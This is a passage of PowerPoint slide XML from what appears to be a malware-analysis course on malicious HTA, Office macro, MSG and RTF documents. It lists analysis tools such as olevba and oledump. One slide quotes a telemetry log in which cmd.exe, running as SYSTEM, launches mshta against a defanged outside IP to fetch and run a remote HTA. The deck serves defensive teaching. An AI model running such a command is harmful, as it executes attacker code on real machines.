              <a:rPr lang="es-ES" sz="1100" dirty="0"/>
              <a:t>":[{"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0" err="1"/>
              <a:t>ChildPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0"/>
              <a:t>":"SYSTEM|\\mshta.exe","</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0" err="1"/>
              <a:t>CommandLine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0"/>
              <a:t>":"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0" err="1"/>
              <a:t>mshta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0"/>
              <a:t>  hxxp://107.181.187.132/check.hta","ParentPath":"SYSTEM|\\cmd.EXE","ChildMd5":"95828D670CFD3B16EE188168E083C3C5","extendedInfo":"","ParentPID":"45842","ChildFileName":"mshta.exe","ParentFileName":"cmd.EXE","LoggedUser":"NT AUTHORITY\\SYSTEM","ParentMd5":"5746BD7E255DD6A8AFA06F7C42C1BA41"}]}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31353420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s-ES" dirty="0"/>
              <a:t>HTA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Documents</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>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400" dirty="0"/>
              <a:t>The tools to analyze, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>deobfuscate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> would be the same ones that are used to analyze VBScripts and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>JScripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>.  Between them:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Notepad++</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://notepad-plus-plus.org/downloads/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Developer tools in browsers, chrome, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, etc.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://developer.chrome.com/docs/devtools/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1"/>
              <a:t>Etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0"/>
              <a:t>…</a:t>
            </a:r>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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3865340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n-US" dirty="0"/>
              <a:t>Microsoft Office. </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400" dirty="0"/>
              <a:t>Very common in corporate environments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Allow the insertion of macros. VBA language (Visual Basic for Applications).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Attackers obfuscate VBA code, as an anti-forensic measure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES"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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagen 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78F8727D-C182-8222-1334-FC71578200F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2740956" y="2335497"/>
            <a:ext cx="3371978" cy="1715867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23378647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n-US" dirty="0"/>
              <a:t>Microsoft Office. </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800" dirty="0"/>
              <a:t>Microsoft Office documents support two document formats:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>OLE2 (Object Linking and Embedding 2).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>The OOXML file format</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>It is a ZIP file that serves as a wrapper for the different contents of the document.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Extension of OOXML documents with macros. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>docm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>xlsm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>pptm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>dotm</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800"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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagen 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B14E488-2BB6-4F36-2109-051D6F0BDB9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3187629" y="2571750"/>
            <a:ext cx="2768742" cy="1663786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15850216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n-US" dirty="0"/>
              <a:t>Microsoft Office. </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800" dirty="0"/>
              <a:t>Macros written in VBA, used by office can exist in three different ways, depending on the scenario.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Source code. The original source code of the macro module is compressed and stored at the end of the module stream. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>P-Code. Compile code. (pseudocode for a device stack).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Execodes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>. When the p-code has been executed at least once. __SRP__ followed by a number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES"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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagen 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{240BB081-D456-7DFA-ABE6-A11D7FD90A49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3730068" y="2971790"/>
            <a:ext cx="1683863" cy="1476540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17338246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n-US" dirty="0"/>
              <a:t>Microsoft Office.</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s-ES" dirty="0"/>
              <a:t>Tools </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>analyze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>deobfuscate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>debug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>olevba.py, oledump.py, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>olecfinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, oledir.py, and olebrowse.py.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0"/>
              <a:t> Didier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1"/>
              <a:t>Stevers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1"/>
              <a:t>Integrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1"/>
              <a:t>REMnux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1"/>
              <a:t>distribution</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457188" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0"/>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://blog.didierstevens.com/programs/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457188" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>MiTeC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Structured Storage Viewer tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457188" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.mitec.cz/ssv.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Pcodedmp.py .  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Vasselin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Bontchev</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Scripts of Boris Larin(Kaspersky Lab) for debugging at the byte code level with tools like IDA Pro and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>WinDbg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ExeFilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> a framework of Philippe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Lagadec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, Arnaud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Kerreneur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>OfficeMalScanner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> of Frank </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Boldewin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>……</a:t>
            </a:r>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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2892550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n-US" dirty="0"/>
              <a:t>MSG Files.</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600" dirty="0"/>
              <a:t>The MSG file format is the one associated with emails exported with the Microsoft Outlook email manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>CFBF files (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Compount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> File Binary Format).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>CFBF works like a container similar to FAT file system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>MSG files, being OLE documents.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Tools oledump.py with the additional plugin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>plugin_msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>oledump.py -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>plugin_msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t> [file.msg]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/down-the-rabbit-hole-extracting-maliciousness-from-msg-files-without-outlook/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1400"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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagen 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EADF0245-394D-F982-E2ED-EFA98C32DE87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5047030" y="2810073"/>
            <a:ext cx="3292638" cy="845452"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29391262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n-US" dirty="0"/>
              <a:t>RTF files.</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400" dirty="0"/>
              <a:t>RTF (Rich Text Format). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1"/>
              <a:t>Designed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1"/>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0"/>
              <a:t> Microsoft.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>The RTF format does not support the inclusion of macros, but allows it to contain OLE1 objects.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>When Microsoft Word opens an RTF file, it extracts the embeds to the user's %TEMP folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>irectly exploit a vulnerability that allows shellcode execution within the application itself.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.mcafee.com/blogs/other-blogs/mcafee-labs/an-inside-look-into-microsoft-rich-text-format-and-ole-exploits/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1400"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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagen 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF2C692F-CB08-296D-3576-7C189C563411}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4341079" y="2128625"/>
            <a:ext cx="4074787" cy="886250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
